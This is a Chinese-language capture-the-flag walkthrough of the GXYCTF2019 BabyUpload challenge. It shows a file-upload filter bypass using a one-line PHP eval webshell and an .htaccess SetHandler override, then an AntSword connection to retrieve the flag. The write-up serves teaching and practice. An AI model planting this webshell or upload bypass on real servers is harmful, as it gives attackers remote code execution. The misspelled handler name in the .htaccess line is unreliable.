文件上传例题：[GXYCTF2019]BabyUpload

打开网址明显文件上传

上传简单php马尝试

后缀名过滤，使用BP抓包进行修改

提示文件类型不对，修改成image/jpeg

提示还是php，那换成js马

<script language="php">eval($_POST['cmd']);</script>

上传成功

解析php代码需要.htaccess文件

在文件内写入

SetHandler application/x-thhpd-php

这条命令可以解析所有后缀文件为php代码

上传.htaccess文件

响应，接着上传js马

使用蚁剑连接

在根目录下找到flag

声明：本站所有文章，如无特殊说明或标注，均为本站原创发布。任何个人或组织，在未征得本站同意时，禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益，可联系我们进行处理。